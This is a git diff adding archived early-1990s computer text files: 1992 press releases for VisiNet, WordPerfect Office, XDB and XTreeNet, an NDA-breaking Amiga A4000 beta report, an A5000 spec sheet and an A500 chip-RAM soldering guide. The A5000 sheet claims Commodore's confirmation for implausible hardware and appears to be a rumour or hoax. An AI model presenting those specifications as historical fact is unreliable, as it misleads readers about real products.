operating under Windows 3.0, VisiNet will operate +under Windows 3.1 and OS/2 2.0 when those environments become available. +Under any of these environments, it provides a graphical user interface +and user-definable icons which allow users to create hierarchical views of +each network layer. Real-time monitoring alerts the user to critical +operating conditions and alarm events. World, country, state and regional +maps or office floor plans may be selected as backgrounds for each view; +custom images created in bit-map or DXF format may also be imported. +VisiNet's database supports the creation and maintenance of up data fields +and list boxes for objects within each node and link. Standard definition +templates, which can later be tailored to specific network needs, help +users get off to a fast start. + +A comprehensive scripting language that lets users define what is monitored +and what conditions will cause an alarm is a key VisiNet feature. The +language was designed with ease of use as a primary objective, but +standard scripts are provided for initial use and customization, allowing +gradual familiarization with the language. + +Because it polls the network constantly, VisiNet sends an alert immediately +when it detects a potential problem. This can be a visible and audible +signal; the user can then respond to the alert, clicking down to view the +cause of the alarm or change in state. + +The polling interval may be selected for each item within each object, +allowing further fine-tuning of network performance. VisiNet builds a +database of activity while it monitors the network. It maintains a +historical log, from which trouble tickets and standard reports may be +pulled for network analysis. Data may also be exported to any application +supporting Dynamic Data Exchange (DDE) or Object Linking and Embedding +(OLE) for analysis or additional activity reports. + +At setup, VisiNet automatically scans the network and identifies each +active node and its configuration. Among the items VisiNet monitors are +processor type, memory capacity, LAN adapters, device drivers and the +values of environment variables. By adding the links and any other +required workstation data, the user can be up and running quickly. Each +time a user signs on, the station's hardware configuration is +automatically scanned, allowing VisiNet to maintain a constantly updated +network configuration. + +VisiSoft shipped its LAN Manager/LAN Server version in August, 1991 and its +NetWare version in November, 1991. Each of these products are priced at +$1995. VisiNet's SNMP version is priced at $2495. + +VisiSoft distributes VisiNet through a worldwide network of value-added +resellers, system integrators and distributors. Inquiries are welcome, and +should be directed to VisiSoft, 430 10th St., NW, Suite S-008, Atlanta, GA +30318, phone 404-874-0428, fax 404-874-6412. + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/wperfect.txt b/textfiles.com/computers/PRESSRELEASE/wperfect.txt new file mode 100644 index 00000000..218e73e5 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/wperfect.txt @@ -0,0 +1,59 @@ +OREM, Utah, January 31, 1992--WordPerfect Corporation today announced the +shipping of WordPerfect Office 3.1 for PC LANs. WordPerfect Office is an +electronic mail and scheduling package combined with other office +automation programs. Users will be able to upgrade their whole domain to +version 3.1 for $199.US/$239.CN. + +WordPerfect Office's E-mail includes folders, status checking, message +retraction, and allows up to 100 attachments. The 3.1 release also +includes a launching feature for the transfer of documents or graphics +into word processing or graphics editing programs. The scheduler program +schedules events, meetings, and office resources over the system. + +WordPerfect Office for PC LANs and WordPerfect Connections, which allows +for LAN-to-LAN communication, are now bundled together. WordPerfect Office +now includes E-mail, Calendaring/Scheduling, and several desktop utility +programs as well as: Remote Mail, improved Directory Services for LAN +Systems Administration, out-bound FAX support, a platform bridge for +connections to Macintosh, UNIX, VMS, and Data General platforms, and an +improved Asynchronous bridge. The license gives users the right to use the +included Connections software on any on-site PC dedicated to connections +activities including async, gateway, and multi-LAN connections. + +With the additional contents, the suggested retail price of a five user +license PC LAN package will remain the same at $495.US/$595.CN. Additional +license-only packages will also be available in quantities of 1, 20, and +100 for $75.US/$89.CN, $1295.US/$1,555.CN, and $5,995.US/$7,195.CN +respectively. The company said its new license-only prices will +accommodate large account purchasing. + +The step to version 3.1 is an important one according to David Clare, +WPCorp director of development. "WordPerfect Office 3.1 is very important +to WPCorp's crossplatform strategy because it creates a bridge between MS +DOS, Macintosh, UNIX, VMS, and Data General systems for exchange of +electronic mail and scheduling services," said + +Product Marketing Manager Andrew Ehat said that "WordPerfect Office 3.1 is +for use in all organizations that are using or considering PC networks +and/or a variety of multi-user platforms and would like to use global mail +and scheduling across these platforms." + +WordPerfect Office is an electronic mail and scheduling package to enhance +PC LAN communication. The product also contains several desktop utility +programs such as a menuing system, flat-file database, calculator, program +and macro editor, and personal calendar. WordPerfect Office has an +approximate user base of 400,000. For more information, contact WPCorp +Information Services at (801) 225-5000. + +WordPerfect Corp, 1555 N. Technology Way, Orem, UT 84057 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/xdb.txt b/textfiles.com/computers/PRESSRELEASE/xdb.txt new file mode 100644 index 00000000..b6ac6428 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/xdb.txt @@ -0,0 +1,137 @@ +February 11, 1992-Laurel, MD-XDB Systems, Inc., the SQL technology leader, +expands its relational database management product line by unveiling +XDB-LINK at NetWorld '92, a new software package that permits PC +applications to transparently access mainframe DB2 data. "Developers can +use XDB-Workbench as well as the interactive XDB tools to query, update, +report, browse and enter data directly to DB2," states Robert Strom, XDB's +Senior Development Manager. With XDB-LINK it is now possible to develop +cooperative processing applications in order to use MIS resources more +efficiently. For example, applications and data that reside in distributed +areas can be viewed as a single data center. + +The XDB-LINK product consists of two components: XDB-LINK Gateway, which +resides on the PC, and the XDB-LINK Host, which resides on the mainframe. +These components communicate via LU6.2 protocols to satisfy DB2 SQL +requests originated from the PC. The XDB-LINK works with IBM's CICS/APPC +product and VTAM. + +XDB-LINK is based on the client-server architecture and supports DOS, OS/2, +and Windows clients. In a development environment, the XDB-LINK product +extends systems level testing to the PC environment by providing access to +mainframe production data. In a production environment, XDB's application +tools (XDB-Workbench, XDB-Tools, XDB-C) and LAN applications can now +access data residing in mainframe DB2 as a database server. + +One significant advantage of the XDB-LINK package is increased +productivity. The data transfer procedure has been streamlined since +developers can now transfer data between the PC and the mainframe in one +step. In addition, data access using XDB-LINK's bulk fetch processing +feature is comparable to local 3270 access. Mike Meyer, Principle Systems +Associate with Mutual Benefit Life Insurance Company in Newark, NJ said, +"With the LINK's bulk fetch processing feature I can save a significant +amount of time and resources required to fetch multiple rows from DB2." + +IBM is scheduled for commercial release of their Distributed Relational +Data Architecture (DRDA) standard next year and XDB intends to supports +DRDA. XDB Systems is committed to providing quality relational database +management products and services. The price range for the XDBLINK is +$21,000 to $36,000 depending upon a company's mainframe CPU size. For more +information stop by Booth #633 or contact XDB Systems, Inc., 14700 +Sweitzer Lane, Laurel, MD 20707-2921; (301) 317-6800. + +-------------------------------------------------------- + +February 11, 1992 - Laurel, MD-XDB Systems, Inc., the SQL technology +leader, will be featuring a new version of their SQL Engine for OS/2 at +NetWorld '92. The XDB-SERVER is a high performance, multi-user database +system that brings the power and integrity of mainframe database systems +to LANs. The core of XDB's product line is the 100% DB2 compatible Engine. +Now with the XDB-SERVER for OS/2 version 2.41, DB2 applications become +portable to client-server platforms. Since the XDB-SERVER is network +independent, DB2 compatibility can exist on multiple platforms and +operating systems. + +The main benefits of the XDB-SERVER for OS/2 version 2.41 are increased +power and performance. Rusty Fiste, XDB's Director of Development, states, +"XDB's new, enhanced SERVER for OS/2 obtains significant performance gains +because of its improved internal buffer management system which minimizes +disk accesses." Multiple physical disk volumes are now supported. Now +developers can utilize multiple disk volumes to separate various data +objects like indices and databases thereby decreasing the amount of time +required to retrieve data. The size of a database is also no longer +limited by the size of one OS/2 disk volume. In addition, the XDB-SERVER +for OS/2 version 2.41 has greatly enhanced its query optimization. + +The XDB-SERVER takes maximum advantage of OS/2 technology. One of the Beta +sites chose XDB-SERVER because they wanted DB2 compatibility on their PC +LAN. Igor Kruglyak, Assistant Vice President & Systems Architect with +Merrill Lynch in Somerset, NJ, states, "We have many users that need to +share DB2 data and the XDB-SERVER provides the fully DB2 compatible +technology for mainframe applications to migrate to the LAN environment." + +-------------------------------------------------------- + +February 11, 1992 - Laurel, MD-XDB Systems, Inc., the SQL technology +leader, will be featuring Version 2.41 of the XDB-Workbench. The new +engine supports both DOS and OS/2 and is designed to provide an +unprecedented level of compatibility with IBM's mainframe relational +database DB2. The XDB-Workbench 2.41 enables COBOL programmers to develop, +test, and run DB2 applications in an inexpensive and friendly PC +environment. XDB has added numerous functions to their new version of +their Workbench 2.41 in order to fine tune their compatibility with DB2. +Rusty Fiste, XDB's Director of Development says, "This latest version of +our workbench delves deep into the distinctive characteristics of DB2." +XDB's reserved words were also made fully compatible with DB2. "This +release further underscores our commitment to ensure 100% compatibility +between XDB's Workbench and DB2," states Rusty Fiste. + +"XDB's Workbench version 2.41 is well suited for downsizing mainframe DB2 +applications, where DB2 compatibility is a crucial consideration. XDB has +made a remarkable commitment to capture the subtle intricacies of the +DB2/SQL engine," says Jonathan Sayles, Director of Education Services for +The Systems Group and a nationally recognized author on relational +technology. Rick Slade, Senior Research Analyst at Sara Lee in +Winston-Salem, North Carolina said, "I chose the XDB-Workbench for +PC-based development because no recoding would be required when we moved +our project back up to the mainframe." + +In addition to DB2 compatibility enhancements, other Product enhancements +include additional referential integrity clauses, date/time functions, +string functions, numeric functions, table privileges, and database +privileges. The XDB-Workbench is the first PC SQL DBMS to provide the +rigorous referential integrity constraints including cascading update, a +fundamental data manipulation function that involves modifying data +records in a continuous series so that all corresponding data is brought +up to date. + +XDB Systems sets the standards for database management. Following the +release of the XDBWorkbench Version 2.41, XDB Systems, Inc. will be +releasing their new XDB-LINK product and their new version of the XDB +SERVER engine for OS/2. The XDB-LINK permits PC applications to directly +access mainframe DB2 data. Developers can use the interactive XDB tools to +query, update, report, browse and enter data directly to DB2. The XDB +SERVER for OS/2, a multi-user database system that brings the power and +integrity of mainframe database systems to LANS, will feature increased +power and memory size enhancements. + +-------------------------------------------------------- +XDB Systems, Inc. offers high performance database solutions that are +powerful, easy to use, and compatible with industry SQL standards. The +XDB-Workbench Version 2.41 makes your PC a complete DB2 applications +development machine. The list price of the XDB-Workbench in $1500.00. For +more information stop by Booth #633 or contact XDB Systems, Inc., 14700 +Sweitzer Lane, Laurel, MD 20707-2921; (301) 317-6800. + +### + + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/xtreenet.txt b/textfiles.com/computers/PRESSRELEASE/xtreenet.txt new file mode 100644 index 00000000..9c42434a --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/xtreenet.txt @@ -0,0 +1,155 @@ +Boston, MA -- February 11, 1992 -- At NetWorld 92 Boston, XTree Company +(Booth #430) will introduce its latest version of XTreeNet -- its file +management utility for Novell networks. The company has added new features +and revamped its licensing policy, making it more cost efficient for +administrators of large networks with multiple server environments. + +Shipping now, XTreeNet 2.07 delivers an unprecedented set of file- and disk +management features designed to give complete control of the network to +the administrator. New features include remote control capabilities which +allow users to control other workstations from a single PC. XTreeNet also +offers full support for all NetWare 386 directory and file attributes. + +New Licensing Policy + +Effective immediately, users of XTreeNet 2.07 can purchase server +extensions for only U.S.$100. This means that users no longer have to +purchase additional product in order to access other servers on the +network through XTreeNet. XTree Company decided to revamp its licensing +product in order to make it more cost efficient for administrators of +multiple server environments, explains Brad Bowen, XTree Company Network +Product Manager. + +Like all XTree products, the new XTreeNet Version 2.07 provides the +familiar graphical tree display of a disk's directory structure, allowing +the easy manipulation of files by using the advanced commands found in the +program. XTreeNet 2.07 can also access local drives as well as file server +volumes. In addition, XTreeNet's new peer-to-peer capability allows access +to any workstation on the network, thereby giving the administrator +unparalleled distributed file management capabilities. + +Peer-to Peer Communications + +Using advanced communication techniques, XTreeNet 2.07 can now view and +manipulate files of any workstation on the network. For the first time, +files on distant workstations can be copied, deleted, and edited from one +location. Instead of running from machine to machine, the administrator +can manage the entire network from his desk enabling workstations to be +setup and maintained with the highest level of convenience. + +Other special network capabilities include: + +* log entire or partial drives +* display and modify all NetWare information associated + with directories and files +* map network drives +* send output from any program to any printer on the network + +Advanced File Management Features + +To provide the most complete set of file management capabilities in any +network utility, XTreeNet 2.07 has advanced capabilities for searching and +rapidly finding data in any file or set of files. + +For example, users can search for any group of files for data they need by +specifying any convenient character sequence, such as a name or date they +remember. + +Within seconds, XTreeNet automatically tags all files containing the +specified data string for further file management operations, such as +directly viewing, copying, or modifying parts of these files even when +stored in Lotus 1-2-3, Microsoft Word, WordPerfect, MultiMate, or any +popular data file format. + +The applications which created these files can then be LAUNCHed +automatically. Text can also be GATHERed in blocks from these files and +moved to a printer or directly into another file -- all with simple, easy +keystrokes. + +At the touch of a single key, a split-screen window capability lets users +see and manipulate files in two unrelated directory trees side-by-side. To +speed and simplify repetitive operations, every XTreeNet command maintains +a history for instant recall by either keystroke or click of a mouse +button. + +Another exclusive feature of XTreeNet 2.07 is the Archive command that +saves time, money and valuable hard disk space by compressing files into +the industry standard .ARC format. Compressed files can be transferred to +disks quicker, using fewer diskettes. They can also be sent via modem or +downloaded from on-line services like CompuServe and MCI faster, reducing +telephone costs and on-line access fees. + +Other new features include PRUNE and GRAFT commands, which allow the moving +or deleting of entire directory tree structures as quickly, easily, and +safely as moving a single file. + +XTreeNet 2.07 also provides a powerful, easy-to-use interface to the +network operating system and all other application software through the +use of an application menu. Up to 12 items can be placed on the menu, and +when selected, will execute the commands assigned to that menu. Using the +application menu or the command shell, XTreeNet can collapse to take up a +minimum amount of RAM when other programs are executed. + +Highest Level of Network Security + +In addition to its disk management capabilities, XTreeNet 2.07 also offers +network supervisors the highest level of security available in the network +environment. "XTreeNet's advanced security features are the result of +extensive research with experienced network managers," explains Bowen. + +XTreeNet 2.07 enhances NetWare's security features by allowing the +supervisor to restrict XTreeNet commands to users or groups based upon +their needs in a particular directory. For further file protection, only +the files and directories to which a user has access rights will be shown +in the XTreeNet display. + +Pricing, Availability, Requirements + +XTreeNet 2.07 is shipping now through the vendor's distributor network, +which includes Ingram Micro, Kenfil, Merisel, Software Resource, and XTree +Authorized Resellers, which include CompUSA, Egghead, Software City, +Software Etc., and other nationwide chains. + +The Advanced/SFT/386 version will retail for U.S.$495. Registered XTreeNet +1.0 users can upgrade for U.S.$149 (plus $4.95 shipping/handling). + +Registered XTreeNet 2.0 customers can upgrade for only U.S.$49 (plus $4.95 +shipping and handling.) + +Server extensions may be purchased for U.S.$100 each, with no limit, +although a base copy of XTreeNet 2.07 must be installed. + +XTreeNet 2.07 requires an IBM PC, XT, AT, PS/2, or a 100% compatible +computer workstation, DOS 3.1 or above, 256K and Novell Advanced NetWare +version 2.1 or above. XTreeNet 2.07 contains both 5.25" and 3.5" program +disks and is not copy protected. Telephone technical support is available +free of charge to registered users. + +For Additional Information + +XTree Company, a division of Executive Systems, Inc., is the world's +leading supplier of disk management software. With more than two million +copies in use, XTree and XTreeGold are well-recognized industry standards +for disk management. + +Other XTree Company products include: XTree Easy and XTreeGold 2.5, the +most comprehensive hard disk manager for the PC available; plus Xtree for +UNIX systems, the leading file disk manager for Intel-based UNIX +implementations. + +At COMDEX/Fall '91, XTree Company released ViruSafe', ViruSafe/LAN, and +AllSafe -- a complete line of virus and security utilities. + +Xtree Company, 4330 Santa Fe Rd, San Luis Obispo, CA 93401 +805-541-0604 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/a4000 b/textfiles.com/computers/a4000 new file mode 100644 index 00000000..94d0d034 --- /dev/null +++ b/textfiles.com/computers/a4000 @@ -0,0 +1,113 @@ + I've been chomping at the bit to speak out and right now I just don't + care about the non-disclosure agreements. We have been beta-testing + the A4000 and another model which may be called the A1000 Classic, + A800, or possibly some other name. Both are based on the AA chipset + and should be able to hold their own against other machines on the + market, but there are still a few areas where they are lacking. + + The A4000 is pretty much an A3000 with an 040 on the motherboard, the + AA chipset instead of the ECS, and beta 2.1 ROMS. Ours has 16M fast + RAM and 4M chip, expandable to 64M and 16M respectively. ZIP RAM like + that in the A3000 is used, but there is a chance that production + machines will go to SIMMS. Our machine has a 105M Quantum hard drive + and a true full- speed high-density floppy. The expansion slots are + Zorro III and appear to be identical to those on the A3000. I am not + positive, but the cpu slot looks to be the same as the one found on + the A3000. + + The other machine is housed in pizza-box style case 3" high and 15" + wide and deep. It has a 16MHz 030, the AA chipset, 2.1 ROMS, and + sockets for up to 16M fast RAM and 4M chip RAM. It has the same + floppy drive as the A4000, but the hard drive is only a 52M Quantum. + There is a daughterboard with two Zorro III slots and one inline video + slot, but it looks to be very cramped in there. The cpu slot is in + the same orientation as that of the A3000 and A4000, but there is not + much clearance. It is a very nice compact package and manages to look + even "sexier" than the A3000/A4000. + + Both machines sport the same I/O ports, starting with the same ports + found on the A3000. The floppy drive and serial ports are now stacked + in the same way as the SCSI and parallel ports, as are the RGBA, VGA, + and audio ports. There is a microphone port that works with the built- + in digitizer, with 8bit 22kHz sampling possible. Not exactly CD + quality, but better than the toy CODEC samplers found on the NeXT, + Mac, and others. The keyboard and mouse ports are on the rear of the + machine, with the joystick ports stacked vertically. This stacking + leaves just enough room for a pair of MIDI ports and another port that + was covered with a plastic cap on both of our units. We pried it off + and it looks like a PCMIA slot, but we've not been able to confirm + this. Given that the A600 has one, this would not be a bad idea, + but it seems odd that it was covered up like that. + + The new mouse looks to be the same as the pregnant mouse, but the + A3000 came with a three button and the other machine a two button. + Both had standard A3000 keyboards. The most shocking thing about + these machines is how much they feel like existing Amigas instead of a + new breed. + + + The AA chipset is a real improvement over the ECS, but it may not be + enough to keep the Amiga competitive for another 7 years. Some of the + chips are similar to those in the ECS, but none look to be drop-in + replacements for existing machines. Agnus, Denise, and Paula have + been improved and all three are now surface mount chips roughly the + size of the fat Agnus. There are three other chips that have tape + covering the names, but one of them is certainly an Amber type de- + interlacer chip. It has what 1M of VRAM in order to handle the + increased color depths and de-interlaces all but the highest + resolution modes. We peeled back the tape a bit on the other two + and one is named Lisa, the other was just a number. The Lisa chip + appears to be responsible for the graphics, but its relationship with + Agnus and Denise is not so clear. The other chip may be the rumored + DSP chip, but none of the software we have mentions it specifically. + There is an A/D chip for the microphone and two D/A chips for the + audio in the same general area, so they are probably related. + + Amiga owners will be surprised at some of the features of the AA + chipset and disappointed with others. The resolutions supported are + similar to those of the ECS, with the addition of the 800x300, 800x600 + interlaced, 1280x480, and 1280x960 interlaced. The Amber de- + interlacer works with all of the modes, but most SVGA monitors can't + handle the non-interlaced 1280x960 mode. All modes can be up to 8 + bitplanes except for the 1280 modes, which are limited to six. The + palette is 24 bit, but there is a way to simulate 12 bit for + compatibility with some older software. A pleasant surprise is the + SuperHAM mode which uses 10 bits to allow for pseudo-24 bit color. + This works in the 320 and 640 modes and is nothing short of + spectacular, with the bonus of being able to handle up to 30fps for + some amazing animation. The 800 and 1280 modes have 8 bit 256k color + and 6 bit 4096 color HAM modes, respectively. There is still a + problem with fringing on raw images, but the better programs seem to + do a pretty good job with reducing the problem. The sprites now + change to match the resolution of the screen, so pointers look much + more professional. They may be up to 64 pixels wide, with no height + limitation. There are still only eight per scanline, but the number + of colors is up to 16 in all modes except for 1280, which is only + four. All in all, these Amigas have graphics that hold their own + against offerings for the PC and Mac, but they won't be able to last + for another seven years without improvement. + + We have not done much with the audio, but 16 bit four channel sound in + up to 56kHz is available. A neat trick is that up to 8 8 bit channels + at 56kHz and up to 16 8 bit 28kHz channels can be emulated. We don't + have any software that takes advantage of these modes with the + exception of the digitizer, but there is a lot of potential. + + The 2.1 OS is pretty much the same as what has been posted on the + nets, but it really looks awesome on the new displays. We have found + the 800x600 256 color Workbench to be very nice and snappy enough to + be useable. The blitter may have been improved, but it does not feel + like it is 4x faster as some like to claim. There are only a few + programs that don't work on these machines, and all of those are pre- + 2.04. If the developers have followed the guidelines set by + Commodore, they should not have any problems. + + There will probably be more than a few folks who are pissed off by me + letting the cat out of the bag, but it looks like something is needed + to keep more people from joining the mass exodus. These machines are + stable enough for production, but the higher-ups seem to have their + heads up their asses and won't release them. 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The '060' with sit on a +seperate card in the cpu slot (as in the A4000) and both the '040' will +sit on the motherboard. The '040' have been design to help the '060' ,this +will be most evident at times of heavy multi-tasking. As a result of this +configuration the A5000 will have a new kickstart. + +Kickstart/Workbench +------------------- + +The A5000 will have kickstart/workbench 4.0 (beta version has 3.2). This +kickstart is required to control the three processors , earlier kickstarts +will not be able to access the '040' (but the '060' can). This kickstart +will not be released for the older machines although 4.1 will. This +kickstart/workbench will enable the '040' to be assigned to different tasks +and as shiped one will handle all screen and sound processing and the other +will handle all of the I/O devices. This kickstart is a 1Mb chip and will +be shipped on the hard drive (to be confirmed). If it is released in chip +form then the chip will be placed on it's own card. This kickstart will have +a user-selectable kickstart screen so the user can select which kickstart to +load (either in slot or on harddrive) and the A5000 has been tested with +kickstart 1.2 upwards so there will be no more compatability problems. + +Chipset +------- + +Commodore have done it again in changing the chipset as there are several +new chips. The A5000 with workbench 4 is now capable of operating in all +modes with a 512 colour pallet. To maintain the speed require to operate +in this mode one of the '040' can be assigned to the screen display (as +it is shipped). The maximum screen resolution is 4096 x 4096 with over +32 million colours on screen. This new chipset will be able to detect which +chipset it should use (orig. ,ECS ,super-ECS or AGA , super AGA ) by +detecting which kickstart is currently running or which is selected at a +cold boot. + +Ram +--- + +As the new chipset has a higher resolution and more colours more chip ram is +required and commodore have responded by having 16Mb of chip ram on the +motherboard (expandable to 64Mb) and 16Mb of fast ram (theoretically +expandable to 1024Mb, tested to 256Mb). The chip and fast ram have been +organised on a 32-bit wide structure as in the A3000 + A4000. + +Drives +------ + +The harddrive interface is the new scsi2 standard with a 210Mb slimline +hardrive mounted as standard. The floppy drive is a high density type and +the CD-drive is a standard A2000 internal drive. + +Sound +----- + +The sound is now 16-bit as the A4000 was supposed to have. + +Internal Connectors +------------------- + +There are eight zorro III expansion slots with three IBM slots in parallel +with three zorro slots. There is no cpu slot as the '060' is on it's own +board and thus can easily replaced. If the kickstart is to be shipped on +the harddrive there will be an empty slot to place a new kickstart. + +External Connectors +------------------- + +It has all the standard ports (disk drive, serial, etc.) and the keyboard +connector (same pins as the A4000) at the back, the mouse ports are on the +right side towards the back. + +Price +----- + +Well that depends on what pack you want as as of this moment there are two + +1 all above = $3499 (Appox.) + +2 all above plus + + Amax v3.0 Mac emulator (100% compatable with all known software) + + + Golden gate IBM emulator = $3999 (Approx.)(uses two zorro III slots) + + + + +This information has been confirmed by Commodore. + + + .....and don't forget to call..... + + + ___ . . . * . . + . / /\ *_________ _______ _______ . ______ + / / / /\ \ . \ \ . /\ \ ./\ \ . +o . /__/ /_ . / \ \ . \ \ / \ \/ \ \ + /__/\ \/\__ / \________\ / \______\. / \______\ \_____\ + _\__\ \ / /\./ / _______// \_ __ \/ / ___ / / ____/ + . /__/\/ \ \/ // / / \ .__/ / / \ \ / / \/_/ / /__\ + / /\ /\ \ // / /___\. \ \ / /\ \ \ / /\____\ / ____/ + / / /\ \ \ \// / _____/___\ \ / / \ / / / /\/__ / / / \ * + /__/ \ \ \_\/ \ / / \ \/ /____\/ / / /___\/ /\/ /_____\ + \__\/\ \ \ \ \ / / \__________/\/________/ \_______/ + \ \ \_\/ . \/ \_____________________________________________\ . + \ \ \ \ / + \__\/ \ -*- The Silents World Head-Quarters -*- / + \____________________________________________/ . + . . . . . . . + . . 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Clear it instead! For all of you who have tried the +A501 chip ram fix and got nothing but a system crash on bootup, this is the +doc 4 u :-) + +Thanks to Greg Change (gchance@ecst.csuchico.edu) for information on how to +correctly do this :-) + + + + <<>> + +DISCLAIMER: Attempting to conduct this procedure will by all means VOID YOUR + WARRANTY! I shall not be held responsible for any problems due + to this modification. I shall not be held responsible for any + problems whatsoever. + +Now I've got myself covered, lets' go on. + +First off, it is required you have a revision 6A motherboard for this pro- +ject. It will work with others, but requires a 1mb Agnus chip and also re- +quires cutting a trace, which I am not familiar with at the moment. + +If you are unfamiliar with electronic repair and modifications, ask an ex- +perienced technician to proceed with the modification. + +READ THESE INSTRUCTIONS CAREFULLY AND THOROUGHLY BEFORE INITATING PROCEDURE!! + +Tools needed: + + #10 Torx Screwdriver + Flat Head Screwdriver + Low Power Soldering Iron + Razor Blade or Exacto-Knife + Anti-Static Guard (optional) + +1. Turn off computer and unplug ALL cords and peripherals from the computer. + This includes the A501. + +2. Now carefully flip the computer over. WARNING! Do NOT grab the A500 on + the left side if the expansion dust cover is off! If you tug hard enough, + you will snap off the connector, and the only way to replace that is by + buying a new motherboard! It's just an edge-connector and can snap easily. + +3. Plug in the soldering iron, just to get it all nice and warm. (make sure + the iron has been on for at LEAST 15 minutes to avoid cold solder joints. + +4. Now take the #10 Torx screwdriver and remove the 6 Torx screws around the + edge of the case (at this point the bottom is facing up, of course. Do + NOT remove any other screws on the bottom of your computer. Save the po- + sition of each screw, because some may be intentionally different lengths + +5. Flip the computer over again and carefully remove the top. If it doesn't + remove with ease, use the flat head screwdriver to pry open the sides. + Using a large screwdriver will make less pry marks in the case, or put a + cloth around it or something. :-) Hopefully this won't permanently de- + stroy the latches in the sides. They should just snap right back togethor + +6. Now remove the cable going from the keyboard to the socket on the mother- + board. It should just pull right out. + +7. Now take the keyboard out and set it off to the side for now. + +8. Now remove the two Torx screws on the left side of the computer facing + the front. Remove the other two Torx screws holding down the grounding + plate of the external expansion port. Now carefully remove these screws + and the grounding plate. Remember the positions of each screw! Try not + to mix them up! Also- Make note of the text under the disk drive. It + should tell you the model, "B52/ROCK LOBSTER" (if you're lucky) and some + other junk. Now look for the text "Rev. 6A". If your motherboard is not + 6A, like I mentioned before, you can still do the mod, but you need to + cut a special trace and unfortunately, I cannot help you with this. + +9. Now is the time to don your anti-static wrist strap, or whatever have + you. + +10. Look around the edge of the RF shield for small metal tabs holding the + cover down. Now carefully bend these tabs up with the flat head screw- + driver. Becareful not to bend them too much, or they will snap off. + This is what happened to mine. :-) + +11. Now remove the RF shield cover. + +12. Get ready, here is the time to do the modification. Be careful not to + hit the Amiga's plastic case with the soldering iron. I did this on some + practice soldering equipment (broken VCR's etc) a while ago and once you + destroy the case you're Amiga will no longer look pretty. (thank god I + didn't do THIS :-) + +Left| +Side| *BE CAREFUL WHEN CUTTING - Be careful NOT to cut any other traces* +of | +Ami | Fig 1 + ++ ____ +E :: -| |- +X :: -| |- +P :: -| M |- 1| 13. Now locate Jumper 2 (JP2) Between the CPU +A :: -| C |- | JP2 and the ROM chip (just above and left of +N :: -| 6 |- 2| _ the ROM chip.) The jumper consists of three +S :: -| 8 |- =| |= solder "pads". See how Fig 1 has these pads +I P:: -| 0 |- 3| =|R|= numbered. When your computer arrived, pads +O O:: -| 0 |- =|O|= 2 and 3 should have been set. We are about +N R:: -| 0 |- =|M|= to change this. Now take your razor blade + T:: -| |- =| |= or Xacto knife and just the trace between + :: -|____|- =|_|= pad 2 and 3. Make sure, and check with a multi- + ++ meter or magnifying glass that there is no + connection between these two pads. Now take + your HOT soldering iron and solder, and + connect pads 2 and 1, just like the jumper + = depicted in Fig 1. Make sure it is a solid + = Fig 2 connection and not a cold joint. + = + = + = 14. Now it is time to locate the other jumper, + JP7A = which is just left of the connector to the + = trapdoor (where the A501 goes). Search for + 1| = Trapdoor another three-padded jumper, labeled "JP7A" + = or JP7. Now cut the trace which was connecting + 2| = pads 2 and 3. Make sure it is a clean, solid + = cut. This jumper should be left open, and no + 3| = pad should be soldered to another. + = + = + = + +15. Now check and make sure all connections are firm and clean, and replace + the RF cover. Then push down the metal tabs and make sure the cover is + secure at those points. + +16. Now replace the grounding plate and CAREFULLY screw the two Torx screws + in. These are special screws- so as soon as it feels firm, no NOT turn + ANY further! This can strip the screwholes and damage your case perm- + enantly. Remember to put each screw in it's dedicated position. + +17. Now replace the other two Torx screws and once again screw them in just + until secure. Remember once again to put each screw in it's dedicated + position. + +18. Replace the keyboard and set it in the special slots so it is secure. + Carefully replace the keyboard cord, and make SURE it is inserted the + correct way. If it is not then I cannot guarantee your system will boot + up and work correctly. + +19. Now snap the top case of the A500 back on. Make sure it is perfectly + aligned and all. + +20. Now carefully flip over the A500, and remember not to grab the edge- + connector! I have never seen this incedent happen but I'm sure it has. + Such a simple mistake could cost you a whole new computer/motherboard. + +21. Now insert each Torx screw. And once again remember to put each screw + in it's dedicated position. (whew!) + +22. Now return the A501 to the trapdoor, close it up and flip the Amiga + over. (and now I KNOW you know not to grab the edge-connector :-) + +23. Plug all other peripherals and cords back in, and turn the machine on. + +24. If it boots up O.K, then hopefully you're in buisness. Now run a program + like SysInfo or PerfMon to make sure you have 1024k of chip ram (1mb) + +25. Have fun! It is now possible to load large large mods, have more graphic + data in memory at once, play better demos, and, in short, fit along with + the rest of the world! :-) Good luck! + +*** If you are having any problems I encourage you to check all of these + steps and make sure nothing was left out or improperly done. + + Stay Cool with your new 1mb of Chip Ram, + + Bill The Cat (wjhun@oswego.edu) + (Will Jhun) + diff --git 